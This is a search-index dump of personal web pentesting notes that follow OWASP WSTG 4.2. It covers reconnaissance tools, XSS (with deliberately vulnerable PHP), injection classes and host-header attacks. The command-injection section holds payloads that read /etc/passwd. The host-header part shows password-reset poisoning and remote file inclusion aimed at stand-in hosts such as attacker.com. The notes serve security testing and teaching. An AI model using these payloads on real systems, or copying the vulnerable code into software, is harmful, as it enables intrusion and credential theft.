        ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#wfuzz","title":"Wfuzz","text":"

        Wfuzz

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#feroxbuster","title":"feroxbuster","text":"

        feroxbuster

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-08/","title":"Fingerprint Web Application Framework","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

        ID Link to Hackinglife Link to OWASP Objectives 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#http-headers","title":"HTTP headers","text":"
• Note the response headers X-Powered-By and X-Generator as well.
• Identify framework-specific cookies. For instance, the CAKEPHP cookie for the CakePHP framework (a quick check is sketched below).
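
These headers and cookies can be checked quickly from the command line (a minimal sketch; example.com is a placeholder):

curl -sI https://example.com | grep -iE 'x-powered-by|x-generator|set-cookie'\n# -s: silent, -I: fetch the response headers only\n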
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#html-source-code","title":"HTML source code","text":"
• The framework is often included in the META tag.
• Revise header and footer sections carefully: general markers and specific markers.
• Look at the typical file and folder structure. An example would be the wp-includes folder for a WordPress installation, or a CHANGELOG file for a Drupal one.
• Check file extensions, as they sometimes reveal the underlying framework.
• Revise error messages. They commonly reveal the framework.

See WSTG-INFO-07 for a reference to HTTrack and EyeWitness for mirroring the code. These utilities replicate the source code of the target domain.
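
Once the site is mirrored, the markers above can be grepped offline (a minimal sketch; targetsite/ is the HTTrack output folder created earlier):

# Look for generator META tags and framework-specific paths in the mirrored copy\ngrep -ri 'generator' targetsite/ | head\ngrep -rl 'wp-includes' targetsite/\n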

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#tools","title":"Tools","text":"

        1. HTTP headers:

X-Powered-By and cookies:
• .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE>
• PHP: PHPSESSID=<COOKIE_VALUE>
• Java: JSESSIONID=<COOKIE_VALUE>

        2. whatweb.

        whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n

        3. Wappalyzer: https://www.wappalyzer.com.

        4. wafw00f:

wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match\n# -i: read targets from an input file\n# -p: proxy the requests\n

        5. Aquatone

        cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n

        6. Addons for browsers:

• BuiltWith: BuiltWith® covers 93,551+ internet technologies, including analytics, advertising, hosting, CMS and many more.

        7. Curl:

        curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n

        8. nmap:

        sudo nmap -v $ip --script banner.nse\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-09/","title":"Fingerprint Web Applications","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.9. Fingerprint Web Applications

        ID Link to Hackinglife Link to OWASP Objectives 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08

This content has been merged into Fingerprint Web Application Frameworks.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-09"]},{"location":"OWASP/WSTG-INFO-10/","title":"Map Application architecture","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.10. Map Application architecture

ID Link to Hackinglife Link to OWASP Objectives 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Application: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs, Network and Security: Reverse proxy, IPS, WAF
• In blind testing, start with the assumption that there is a simple setup (a single server).
• Then, question whether there is a firewall protecting the web server.
• Is it a stateful firewall or is it an access list filter on a router? Is it bypassable?
• See response headers and try to identify a typical firewall response header.
• Reverse proxies might be in use, and configured as an Intrusion Prevention System.
• An application-level firewall might be in use.
• Proxy caches can be in use.
• Is there a load balancer in place? F5 BIG-IP load balancers introduce some prefixed cookies.
• Some application web servers include values in the response or rewrite URLs automatically to do session tracking.
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-10"]},{"location":"OWASP/WSTG-INPV-01/","title":"Testing for Reflected Cross Site Scripting","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

        ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser-executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

        XSS Filter Evasion Cheat Sheet

        ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#causes","title":"Causes","text":"

        This vulnerable PHP code in a welcome page may lead to an XSS attack:

        <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
        ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#attack-techniques","title":"Attack techniques","text":"

        Go to my XSS cheat sheet

        ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-02/","title":"Testing for Stored Cross Site Scripting","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

        ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

Stored cross-site scripting is a vulnerability where an attacker is able to inject JavaScript code into a web application's database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload into a webpage on a website without proper sanitization, the XSS payload injected into the webpage will be executed by the browser of anyone who visits that webpage.

        ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#causes","title":"Causes","text":"

        This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

<?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=@$_GET['name']?>\n
        ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#attack-techniques","title":"Attack techniques","text":"

        Go to my XSS cheat sheet

        ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-03/","title":"Testing for HTTP Verb Tampering","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.3. Testing for HTTP Verb Tampering

        ID Link to Hackinglife Link to OWASP Description 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06

        This content has been merged into:\u00a0Test HTTP Methods

        ","tags":["web pentesting","WSTG-INPV-03"]},{"location":"OWASP/WSTG-INPV-04/","title":"Testing for HTTP Parameter Pollution","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.4. Testing for HTTP Parameter Pollution

        ID Link to Hackinglife Link to OWASP Description 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP.","tags":["web pentesting","WSTG-INPV-04"]},{"location":"OWASP/WSTG-INPV-05/","title":"Testing for SQL Injection","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

        ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it.

        SQL injection testing checks if it is possible to inject data into an application/site so that it executes a user-controlled SQL query in the database. Testers find a SQL injection vulnerability if the application uses user input to create SQL queries without proper input validation.
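
A quick first probe is to inject a single quote and look for database errors in the response (a minimal sketch; the URL and parameter are placeholders):

curl -s \"http://example.com/item.php?id=1'\" | grep -iE 'sql|syntax|mysql|warning'\n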

        ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-05/#see-my-notes","title":"See my notes","text":"
        • SQL injection: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
        • NoSQL injection: What is it. Typical payloads.
        • Manual attack.
        ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-06/","title":"Testing for LDAP Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.6. Testing for LDAP Injection

        ID Link to Hackinglife Link to OWASP Description 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection:","tags":["web pentesting","WSTG-INPV-06"]},{"location":"OWASP/WSTG-INPV-07/","title":"Testing for XML Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.7. Testing for XML Injection

        ID Link to Hackinglife Link to OWASP Description 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities.","tags":["web pentesting","WSTG-INPV-07"]},{"location":"OWASP/WSTG-INPV-08/","title":"Testing for SSI Injection","text":"OWASP
OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.8. Testing for SSI Injection
        ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-08/#server-side-includes-ssi-injection","title":"Server-Side Includes (SSI) Injection","text":"

SSIs are directives used in web applications to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI directives before supplying the page to the user.

SSI can lead to Remote Command Execution (RCE); however, most web servers have the exec directive disabled by default.
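
A typical probe injects an SSI directive into a reflected parameter and checks whether the server evaluates it (a minimal sketch; page.shtml and the name parameter are placeholders, and # must be URL-encoded as %23):

# If evaluated, the response shows the server date instead of the literal directive\ncurl 'http://example.com/page.shtml?name=<!--%23echo%20var=\"DATE_LOCAL\"-->'\n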

        ","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-09/","title":"Testing for XPath Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.9. Testing for XPath Injection

        ID Link to Hackinglife Link to OWASP Description 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181","tags":["web pentesting","WSTG-INPV-09"]},{"location":"OWASP/WSTG-INPV-10/","title":"Testing for IMAP SMTP Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.10. Testing for IMAP SMTP Injection

        ID Link to Hackinglife Link to OWASP Description 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts.","tags":["web pentesting","WSTG-INPV-10"]},{"location":"OWASP/WSTG-INPV-11/","title":"Testing for Code Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection

        ID Link to Hackinglife Link to OWASP Description 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity.","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-11/#local-file-inclusion","title":"Local File Inclusion","text":"

        See my notes on Local File Inclusion

        ","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-12/","title":"Testing for command injection","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.12. Testing for Command Injection

        ID Link to Hackinglife Link to OWASP Description 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:|

        Command injection vulnerabilities in the context of web application penetration testing occur when an attacker can manipulate the input fields of a web application in a way that allows them to execute arbitrary operating system commands on the underlying server. This type of vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.

        Causes:

        • User Input Handling: Web applications often take user input through forms, query parameters, or other means.
        • Lack of Input Sanitization: Insecurely coded applications may fail to properly validate, sanitize, or escape user inputs before using them in system commands.
        • Injection Points: Attackers identify injection points, such as input fields or URL query parameters, where they can insert malicious commands.

        Impact:

        • Unauthorized Execution: Attackers can execute arbitrary commands with the privileges of the web server process. This can lead to unauthorized data access, code execution, or system compromise.
        • Data Exfiltration: Attackers can exfiltrate sensitive data, such as database content, files, or system configurations.
• System Manipulation: Attackers may manipulate the server, install malware, or create backdoors for future access.
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#how-to-test","title":"How to Test","text":"

Malicious Input: Attackers craft input that includes special characters, like semicolons, pipes, backticks, and other shell metacharacters, to break out of the intended input context and inject their commands. Command Execution: When the application processes the attacker's input, it constructs a shell command using the malicious input. The server, believing the command to be legitimate, executes it in the underlying operating system.

        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#case-study-perl","title":"Case Study: Perl","text":"

        When viewing a file in a web application, the filename is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol | onto the end of the filename.

        # Example URL before alteration\nhttp://sensitive/cgi-bin/userData.pl?doc=user1.txt \n\n# Example URL modified\nhttp://sensitive/cgi-bin/userData.pl?doc=/bin/ls|\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php-code-injection","title":"PHP code injection","text":"

        PHP code injection vulnerabilities, also known as PHP code execution vulnerabilities, occur when an attacker can inject and execute arbitrary PHP code within a web application. These vulnerabilities are a serious security concern because they allow attackers to gain unauthorized access to the server, execute malicious actions, and potentially compromise the entire web application.

        Malicious Input: Attackers craft input that includes PHP code snippets, often enclosed within PHP tags (<?php ... ?>) or backticks (`).

        Code Execution: When the application processes the attacker's input, it includes the injected PHP code as part of a PHP script that is executed on the server.

        This allows the attacker to run arbitrary PHP code in the context of the web application.

Command injection: Appending a semicolon to the end of a URL for a .php page, followed by an operating system command, will execute the command. %3B is the URL-encoded form of the semicolon.

# Directly injecting operating system commands:\nhttp://sensitive/something.php?dir=%3Bcat%20/etc/passwd\n\n#########\n# Injecting PHP commands\n#########\n\n# Validating that the injection is possible\nhttp://example.com/page.php?message=test;phpinfo();\nhttp://example.com/page.php?id=1'];phpinfo();\n\n# Executing PHP commands\nhttp://example.com/page.php?message=test;system('cat%20/etc/passwd')\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#special-characters-for-command-injection","title":"Special characters for command injection","text":"

The following special characters can be used for command injection:

        | ; & $ > < ' ! \n
# cmd2 receives the output of cmd1 and is executed whether cmd1 succeeds or not\ncmd1|cmd2\n\n# cmd2 is executed after cmd1, whether cmd1 succeeds or not\ncmd1;cmd2\n\n# cmd2 will only be executed if cmd1 execution fails\ncmd1||cmd2\n\n# cmd2 will only be executed if cmd1 execution succeeds\ncmd1&&cmd2\n\n# Command substitution. For example, echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)\n$(cmd)\n\n# Backticks execute the enclosed command. For example, `whoami`\n`cmd`\n\n# Process substitution\n>(cmd) : >(ls) \n<(cmd) : <(ls)\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#code-review-dangerous-api","title":"Code Review Dangerous API","text":"

Be aware of uses of the following APIs, as they may introduce command injection risks (a quick grep for them is sketched after these lists).

        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#java","title":"Java","text":"
        Runtime.exec()\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#cc","title":"C/C++","text":"
        system \nexec \nShellExecute\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#python","title":"Python","text":"
exec\neval\nos.system\nos.popen\nsubprocess.Popen\nsubprocess.call\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php","title":"PHP","text":"
        system\nshell_exec \nexec\nproc_open \neval\n
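
During code review, these calls can be located quickly with grep (a minimal sketch for a PHP codebase; ./src is a placeholder and the pattern should be adapted per language):

grep -rnE 'system\\(|shell_exec\\(|exec\\(|proc_open\\(|eval\\(' ./src\n# -r: recursive, -n: show line numbers, -E: extended regex\n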
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-13/","title":"Testing for Format String Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.13. Testing for Format String Injection

        ID Link to Hackinglife Link to OWASP Description 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application.","tags":["web pentesting","WSTG-INPV-13"]},{"location":"OWASP/WSTG-INPV-14/","title":"Testing for Incubated Vulnerability","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.14. Testing for Incubated Vulnerability

        ID Link to Hackinglife Link to OWASP Description 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible.","tags":["web pentesting","WSTG-INPV-14"]},{"location":"OWASP/WSTG-INPV-15/","title":"Testing for HTTP Splitting Smuggling","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.15. Testing for HTTP Splitting Smuggling

        ID Link to Hackinglife Link to OWASP Description 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.","tags":["web pentesting","WSTG-INPV-15"]},{"location":"OWASP/WSTG-INPV-16/","title":"Testing for HTTP Incoming Requests","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.16. Testing for HTTP Incoming Requests

        ID Link to Hackinglife Link to OWASP Description 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes of end user Browser proxy or client-side application.","tags":["web pentesting","WSTG-INPV-16"]},{"location":"OWASP/WSTG-INPV-17/","title":"Testing for Host Header Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.17. Testing for Host Header Injection

        ID Link to Hackinglife Link to OWASP Description 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header.

        The goal:

        • Assess if the Host header is being parsed dynamically in the application.
        • Bypass security controls that rely on the header.

        Source: https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#supply-an-arbitrary-host-header","title":"Supply an arbitrary Host header","text":"

        Some intercepting proxies derive the target IP address from the Host header directly, which makes this kind of testing all but impossible; any changes you made to the header would just cause the request to be sent to a completely different IP address. However, Burp Suite accurately maintains the separation between the Host header and the target IP address.

In Burp Suite, set the target to www.example.com. Then, send your request with a modified Host header:

        GET / HTTP/1.1\nHost: www.attacker.com\n

        The front-end server or load balancer that received your request may simply not know where to forward it, resulting in an \"Invalid Host header\" error of some kind. This is especially likely if your target is accessed via a CDN.
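
The same test can be reproduced outside Burp (a minimal sketch; $ip stands for the target address, following the convention used elsewhere in these notes):

curl -s -o /dev/null -w '%{http_code}\\n' -H 'Host: www.attacker.com' http://$ip/\n# A 200 here suggests the front end routes the request despite the arbitrary Host header\n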

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#inject-host-override-headers","title":"Inject host override headers","text":"","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#x-forwarded-host-header-bypass","title":"X-Forwarded Host Header Bypass","text":"
        GET / HTTP/1.1\nHost: www.example.com\nX-Forwarded-Host: www.attacker.com\n

        Potentially producing client-side output such as:

        <link src=\"http://www.attacker.com/link\" />\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#more-headers-bypassing","title":"More headers bypassing","text":"

        Although\u00a0X-Forwarded-Host\u00a0is the de facto standard for this behavior, you may come across other headers that serve a similar purpose, including:

        • X-Host
        • X-Forwarded-Server
        • X-HTTP-Host-Override
        • Forwarded

In Burp Suite, you can use Param Miner's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#injecting-multiple-host-headers","title":"Injecting multiple Host headers","text":"
GET / HTTP/1.1\nHost: www.example.com\nHost: www.attacker.com\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#http_host-vs-server_name-routing","title":"HTTP_HOST vs. SERVER_NAME Routing","text":"

        By supplying an absolute URL.

        POST https://example.com/passwordreset HTTP/1.1\nHost: www.evil.com\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#port-based-attack","title":"Port-based attack","text":"

Web servers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax:

POST /user/passwordreset HTTP/1.1\nHost: example.com:@attacker.net\n

This may result in a password reset link whose host part points at attacker.net; when the victim clicks it, their browser sends the reset token to attacker.net before showing the suspicious URL.

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#persistent-xss-via-host-header-injection","title":"Persistent XSS via Host header injection","text":"
        GET /index.html HTTP/1.1\nHost: cow\\\"onerror='alert(1)'rel='stylesheet'\" http://example.com/ | fgrep cow\\\n

        The response should show a poisoned <link> element:

        <link href=\"http://cow\"onerror='alert(1)'rel='stylesheet'/\" rel=\"canonical\"/>\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#add-line-wrapping","title":"Add line wrapping","text":"

        The website may block requests with multiple Host headers, but you may be able to bypass this validation by indenting one of them like this. Some servers will interpret the indented header as a wrapped line and, therefore, treat it as part of the preceding header's value. Other servers will ignore the indented header altogether.

        GET /example HTTP/1.1 \n    Host: attacker.com \nHost: example.com\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#exploitation","title":"Exploitation","text":"

        https://portswigger.net/web-security/host-header/exploiting

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-18/","title":"Testing for Server-side Template Injection","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

        ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit.

        Server-side Template Injection in HackingLife

Web applications commonly use server-side templating technologies (Jinja2, Twig, FreeMarker, etc.) to generate dynamic HTML responses. Server-side Template Injection (SSTI) vulnerabilities occur when user input is embedded in a template in an unsafe manner, which can result in remote code execution on the server. Any feature that supports advanced user-supplied markup may be vulnerable to SSTI.
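
A common first detection step is submitting arithmetic template expressions and checking whether they are evaluated (a minimal sketch; the URL and parameter are placeholders):

# If the response contains 49 instead of the literal payload, a template engine is evaluating the input\ncurl 'http://example.com/page?name={{7*7}}'\ncurl 'http://example.com/page?name=${7*7}'\n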

        ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-18/#see-my-notes","title":"See my notes","text":"
• Server Side Template Injections: What is it. How this attack works. Attack classification. Types of template engines. Payloads. Dictionaries.
        ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-19/","title":"Testing for Server-Side Request Forgery","text":"OWASP

OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

ID Link to Hackinglife Link to OWASP Description 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Assess the severity of the vulnerability.

        ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-19/#see-my-notes","title":"See my notes","text":"
        • Server Side Request Forgery SSRF: What is it. Payloads. Techniques. Dictionaries. Tools.
        ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-20/","title":"Testing for Mass Assignment","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.20. Testing for Mass Assignment

        ID Link to Hackinglife Link to OWASP Description 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["web pentesting","WSTG-INPV-20"]},{"location":"OWASP/WSTG-SESS-01/","title":"Testing for Session Management Schema","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.1. Testing for Session Management Schema

        ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated.

        Session management in web applications refers to the process of securely handling and maintaining user sessions. A session is a period of interaction between a user and a web application, typically beginning when a user logs in and ending when they log out or their session expires due to inactivity. During a session, the application needs to recognize and track the user, store their data, and manage their access to different parts of the application.

        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#components","title":"Components","text":"
        • Session Identifier: A unique token (often a session ID) is assigned to each user's session. This token is used to associate subsequent requests from the user with their session data.
        • Session Data: Information related to the user's session, such as authentication status, user preferences, and temporary data, is stored on the server.
        • Session Cookies: Session cookies are small pieces of data stored on the user's browser that contain the session ID. They are used to maintain state between the client and server.
        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#what-is-session-used-for","title":"What is session used for","text":"
        • User Authentication: Session management is critical for user authentication. After a user logs in, the session management system keeps track of their authenticated state, allowing them to access protected resources without repeatedly entering credentials.
        • User State: Web applications often need to maintain state information about a user's activities. For example, in an e-commerce site, the session management system keeps track of the items in a user's shopping cart.
        • Security: If proper session management is not implemented correctly, it can lead to vulnerabilities such as session fixation, session hijacking, and unauthorized access.
        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#session-management-testing","title":"Session Management Testing","text":"

        Some typical vulnerabilities related to session management are:

• Session Fixation Testing: Test for session fixation vulnerabilities by attempting to set a known session ID (controlled by the tester) and then logging in with another account. Verify whether the application accepts the predefined session ID and allows the attacker access to the target account.
        • Session Hijacking Testing: Test for session hijacking vulnerabilities by trying to capture and reuse another user's session ID. Tools like Wireshark or Burp Suite can help intercept and analyze network traffic for session data.
        • Session ID Brute-Force: Attempt to brute force session IDs to assess their complexity and the application's resistance to such attacks.
        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-02/","title":"Testing for Cookies Attributes","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.2. Testing for Cookies Attributes

